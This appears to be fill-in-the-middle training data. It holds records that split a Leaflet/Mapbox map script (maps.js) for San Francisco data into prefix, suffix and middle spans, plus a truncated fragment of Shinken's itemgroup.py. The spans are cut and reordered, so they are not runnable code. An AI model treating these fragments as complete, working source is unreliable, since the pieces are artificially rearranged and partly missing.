dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") {
feature.properties.margin = parseFloat(dataObject[margin]);
}
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function setOverlayLayers() {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>'); | title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | var title = $('<span>'); | random_line_split |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
}
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") |
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function setOverlayLayers() {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>');
var title = $('<span>');
title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | {
feature.properties.margin = parseFloat(dataObject[margin]);
} | conditional_block |
maps.js | var hubMap = {
version: ".1"
};
function HubMap(options) |
HubMap.prototype.getMap = function() {
return this.map
}
/*
Load and process data for use in the map
*/
HubMap.prototype.loadData = function() {
var $$ = this, options = $$.options;
var data = (/^https?:\/\//.test(options.data)) ? options.data : '/data-browser/data/' + options.data;
$$.options.dataType = (data.indexOf("geojson") > -1 ? "geojson" : data.indexOf("json") > -1 ? "json" : data.indexOf("csv") > -1 ? "csv" : false);
if(!options.dataType) {
throw new Error('Data is not one of either json, geojson or csv');
}
if(options.type == 'map-point') {
$$.getOverlayData(function() {
if(options.dataType == 'geojson') {
$.getJSON(data, function(geojson) {
$$.data = geojson;
$$.render();
});
} else if(options.dataType == 'csv') {
var layer = omnivore.csv(data).on('ready',function() {
$$.data = layer.toGeoJSON();
$$.render();
});
}
});
} else if(options.type == 'map') {
$.ajax({
type: "GET",
url: data,
dataType: "text",
success: function(data) {
json = scaleData(d3.csv.parse(data));
$.getJSON('/data-browser/data/sf_census_tracts.json', function(geodata) {
$$.data = addDataToGeoJson(json, geodata);
$$.render();
});
}
});
}
function scaleData(data) {
$$.valuesOnlyArray = extractValuesFromObjectArray(data);
quantizer = new Quantizer($$.valuesOnlyArray, options.scale);
$.each(data, function(i, dataObject) {
dataObject.scaledValue = quantizer.quantileNumber(parseFloat(dataObject[options.x]));
});
return data;
}
function extractValuesFromObjectArray(dataObjectArray) {
return $.map(dataObjectArray, function(dataObject) {
return parseFloat(dataObject[options.x]);
});
}
function Quantizer(dataArray, s) {
var min = d3.min(dataArray);
var max = d3.max(dataArray);
this.quantizeNumber = d3.scale.quantize()
.domain([min, max])
.range(d3.range(1, s + 1)); // Start with only mapping on 1-5 color scale
this.quantileNumber = d3.scale.quantile()
.domain(dataArray)
.range(d3.range(1, s + 1));
}
function addDataToGeoJson(data, geojson) {
var column = options.x, margin = options.margin;
var dataHash = {};
$.each(data, function(i, dataObject) {
dataHash[dataObject['GEOID10']] = dataObject;
});
$.each(geojson.features, function(i, feature) {
geoid = feature.properties.GEOID10;
dataObject = dataHash[geoid];
if (dataObject && !(isNaN(parseFloat(dataObject[column])))) {
feature.properties.scaledValue = dataObject.scaledValue;
feature.properties.value = parseFloat(dataObject[column]);
feature.properties.scale = parseInt(options.scale);
if (margin !== "") {
feature.properties.margin = parseFloat(dataObject[margin]);
}
} else {
feature.properties.scaledValue = -1;
feature.properties.value = -1;
feature.properties.scale = parseInt(options.scale);
}
});
return geojson;
}
};
/*
Render the map
*/
HubMap.prototype.render = function() {
var $$ = this, options = $$.options, closeTooltip;
var popup = options.popup,
column = options.x,
colors = options.colors;
var onEachFeature = function(feature, layer) {
layer.on({
mousemove: mousemove,
mouseout: mouseout,
dblclick: zoomToFeature
});
}
L.mapbox.accessToken = 'pk.eyJ1IjoiZGF0YXNmIiwiYSI6Ilo3bVlHRDQifQ.7gkiPnZtioL8CnCvJ5z9Bg';
/* initialize map and extra controls */
var z = options.zoom || 12
$$.map = L.mapbox.map($$.options.container, 'datasf.j9b9ihf0').setView([37.767806, -122.438153], z);
L.control.fullscreen().addTo($$.map);
/* add base layer: this can be abstracted further to just pass in geojson data and layer function */
if(options.type == 'map-point') {
$$.baseLayer = customLayer($$.data).addTo($$.map);
setOverlayLayers();
} else if(options.type == 'map') {
if(options.dataType == 'csv') {
$$.baseLayer = L.geoJson($$.data, {
style: getStyle,
onEachFeature: onEachFeature
}).addTo($$.map);
var autoPopup = new L.Popup({
autoPan: false
});
}
}
if(!$$.options.legendCategories) {
$$.buildLegend();
$$.map.legendControl.addLegend($$.legend);
}
$$.bindInteractive();
var info = L.control({
position: 'bottomleft'
});
info.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'info');
this.update();
return this._div;
};
info.update = function(props) {
this._div.innerHTML = (props && props.label ? '<b>' + props.label + '</b>' : '');
};
info.addTo($$.map);
function customLayer(data) {
if(!data) {
data = null;
}
return L.geoJson(data, {
pointToLayer: function(feature, latlng) {
if ($$.options.legendCategories.indexOf(feature.properties[column]) == -1) {
$$.options.legendCategories.push(feature.properties[column]);
}
return new L.CircleMarker(latlng, {
radius: 4,
color: '#000',
fillColor: $$.getColor($$.options.legendCategories.indexOf(feature.properties[column]) + 1, $$.options.legendCategories.length < 3 ? 3 : $$.options.legendCategories.length),
fillOpacity: 1,
stroke: true,
weight: 1,
opacity: .8
});
},
onEachFeature: bindPointPopup
});
}
function bindPointPopup(feature, layer) {
var popupContent = "<h1 class='popup-title'>" + feature.properties[popup.title] + "</h1>";
popupContent += "<p>" + feature.properties[popup.subtitle] + "</p>";
if (Array.isArray(popup.info)) {
popupContent += "<p>";
var info = popup.info;
for (var i = 0; i < info.length; i++) {
if (feature.properties[info[i]]) {
popupContent += "<b>" + info[i].replace(/_/g," ").toTitleCase() + "</b>: " + feature.properties[info[i]] + "</br>";
}
}
popupContent += "</p>";
}
layer.bindPopup(popupContent);
}
function getStyle(feature) {
var color = $$.getColor(feature.properties.scaledValue, feature.properties.scale);
return {
fillColor: color,
weight: 2,
opacity: 0.3,
color: '#808080',
fillOpacity: 0.7
};
}
function mousemove(e) {
var layer = e.target;
if (options.type != 'map-point') {
var value = "<p>" + layer.feature.properties.value + options.units + "</p>";
if (layer.feature.properties.margin) {
value += "<p>Margin of error: +/-" + layer.feature.properties.margin + "%</p>";
}
if (layer.feature.properties.value == -1) {
value = "No Data";
}
autoPopup.setLatLng(e.latlng);
autoPopup.setContent('<h1 class="popup-title">' + layer.feature.properties.LABEL + '</h2>' +
"<p>" + value + "</p>");
if (!autoPopup._map) autoPopup.openOn($$.map);
window.clearTimeout(closeTooltip);
}
// highlight feature
layer.setStyle({
weight: 3,
opacity: 0.4,
color: d3.rgb('#808080').darker()
});
if (!L.Browser.ie && !L.Browser.opera) {
layer.bringToBack();
}
info.update(layer.feature.properties);
}
function mouseout(e) {
var to = e.originalEvent.toElement;
if(options.type == 'map') {
$$.baseLayer.resetStyle(e.target);
} else {
$$.overlayTemplate.resetStyle(e.target);
}
if (options.type == 'map') {
closeTooltip = window.setTimeout(function() {
$$.map.closePopup();
}, 100);
}
info.update();
}
function zoomToFeature(e) {
if (map.getZoom() >= 12) {
map.setView(e.latlng, map.getZoom() + 1);
} else {
map.fitBounds(e.target.getBounds());
}
}
function setOverlayLayers() {
//Todo: abstract this so that I can pass in names of layers earlier on, for now, these are hard coded
var baseDefinition = {
style: {
weight: 2,
opacity: 0.4,
color: '#808080',
fillOpacity: 0
},
onEachFeature: onEachFeature
}
var overlayLayers = {
"No Overlay": new L.layerGroup(),
"Supervisor Districts": new L.geoJson($$.overlayData[0], baseDefinition),
"Neighborhoods": new L.geoJson($$.overlayData[1], baseDefinition)
}
$$.overlayTemplate = new L.geoJson($$.overlayData[1], baseDefinition);
L.control.layers(overlayLayers, null).addTo($$.map);
}
};
/*
Get color from colorbrewer
*/
HubMap.prototype.getColor = function(num,s) {
if (num === -1) {
return "transparent";
}
return colorbrewer[this.options.colors][s][num - 1];
};
/*
Generate and set the legend
*/
HubMap.prototype.buildLegend = function() {
var $$ = this, options = $$.options,
categories = $$.options.legendCategories, colors = options.colors, scale = options.scale;
if(options.type == 'map-point') {
var labels = [];
var container = $('<div>');
var title = $('<span>');
title.html('<b>Legend (click to filter)</b>');
container.append(title);
for (var i = 0; i < categories.length; i++) {
var item = $('<div class="legend-item">');
var symbol = item.append($('<i>').css("background", $$.getColor(i + 1, categories.length)));
var checkbox = item.append($('<input class="legend-filter" type="checkbox" id="' + i + '" checked="true" style="display:none;" value="' + categories[i] + '" />'));
var label = $('<span>').html(categories[i]);
item.append(label);
container.append(item);
labels.push(label);
}
$$.legend = $('<div>').append(container).html();
return this;
} else {
var legendColors = d3.scale.quantile()
.domain($$.valuesOnlyArray)
.range(colorbrewer[colors][scale]);
var labels = [];
for (var i = 0; i < scale; i++) {
var range = legendColors.invertExtent(colorbrewer[colors][scale][i]);
from = Math.round(range[0] * 10) / 10;
to = Math.round(range[1] * 10) / 10;
labels.push(
'<i style="background:' + $$.getColor(i + 1, scale) + '"></i> ' +
from + (to ? '–' + to : '+') + options.units);
}
var legendTitle = (options.legendTitle == '' ? 'Legend' : options.legendTitle);
$$.legend = '<span><b>' + legendTitle + '</b></span><br>' + labels.join('<br>');
return this;
}
};
HubMap.prototype.getOverlayData = function(cb) {
$$ = this, options = $$.options;
for (var i = 0; i < $$.overlays.length; i++) {
(function(i) {
$.getJSON($$.overlays[i], function(geojson) {
$$.overlayData[i] = geojson;
}).done(function() {
if(i == $$.overlays.length - 1) {
cb();
}
});
})(i);
}
}
HubMap.prototype.bindInteractive = function() {
var $$ = this, options = $$.options;
$('#' + options.container).off('click').on('click', '.legend-item', function(e) {
$(this).children('.legend-filter').prop('checked') ? $(this).children('.legend-filter').prop('checked', false) : $(this).children('.legend-filter').prop('checked', true);
$(this).children('i').toggleClass('off');
var enabled = {};
$('.legend-filter').each(function(i, el) {
if ($(el).prop('checked')) enabled[$(el).val()] = true;
});
$$.baseLayer.clearLayers();
$$.baseLayer.options.filter = function(feature, layer) {
return (feature.properties[options.x] in enabled);
}
$$.baseLayer.addData($$.data);
});
}
hubMap.generate = function(options, container) {
if (container) {
options.container = container;
}
var hubMap = new HubMap(options);
hubMap.loadData();
return hubMap
} | {
this.options = options;
this.data = "";
this.map = false;
this.legend = "";
this.options.scale = (options.scale !== "" ? parseInt(options.scale) : null);
this.options.legendCategories = options.legendCategories || [];
this.baseLayer = "";
this.valuesOnlyArray = [];
/* default overlays */
this.overlays = ['/data-browser/data/sup_districts.json', '/data-browser/data/neighborhoods.json'];
this.overlayData = [];
this.overlayTemplate = "";
} | identifier_body |
itemgroup.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# And itemgroup is like a item, but it's a group of items :)
from item import Item, Items
from shinken.brok import Brok
from shinken.property import StringProp, ListProp, ToGuessProp
from shinken.log import logger
# TODO: subclass Item & Items for Itemgroup & Itemgroups?
class Itemgroup(Item):
id = 0
properties = Item.properties.copy()
properties.update({
'members': ListProp(fill_brok=['full_status'], default=None, split_on_coma=True),
# Shinken specific
'unknown_members': ListProp(default=None),
})
def __init__(self, params={}):
self.id = self.__class__.id
self.__class__.id += 1
cls = self.__class__
self.init_running_properties()
for key in params:
if key in self.properties:
val = self.properties[key].pythonize(params[key])
elif key in self.running_properties:
warning = "using a the running property %s in a config file" % key
self.configuration_warnings.append(warning)
val = self.running_properties[key].pythonize(params[key])
else:
warning = "Guessing the property %s type because it is not in %s object properties" % \
(key, cls.__name__)
self.configuration_warnings.append(warning)
val = ToGuessProp.pythonize(params[key])
setattr(self, key, val)
# Copy the groups properties EXCEPT the members
# members need to be fill after manually
def copy_shell(self):
cls = self.__class__
old_id = cls.id
new_i = cls() # create a new group
new_i.id = self.id # with the same id
cls.id = old_id # Reset the Class counter | val = getattr(self, prop)
setattr(new_i, prop, val)
# but no members
new_i.members = []
return new_i
def replace_members(self, members):
self.members = members
# If a prop is absent and is not required, put the default value
def fill_default(self):
cls = self.__class__
for prop, entry in cls.properties.items():
if not hasattr(self, prop) and not entry.required:
value = entry.default
setattr(self, prop, value)
def add_string_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not hasattr(self, "members"):
self.members = []
add_fun(self.members, member)
def add_string_unknown_member(self, member):
add_fun = list.extend if isinstance(member, list) else list.append
if not self.unknown_members:
self.unknown_members = []
add_fun(self.unknown_members, member)
def __str__(self):
return str(self.__dict__) + '\n'
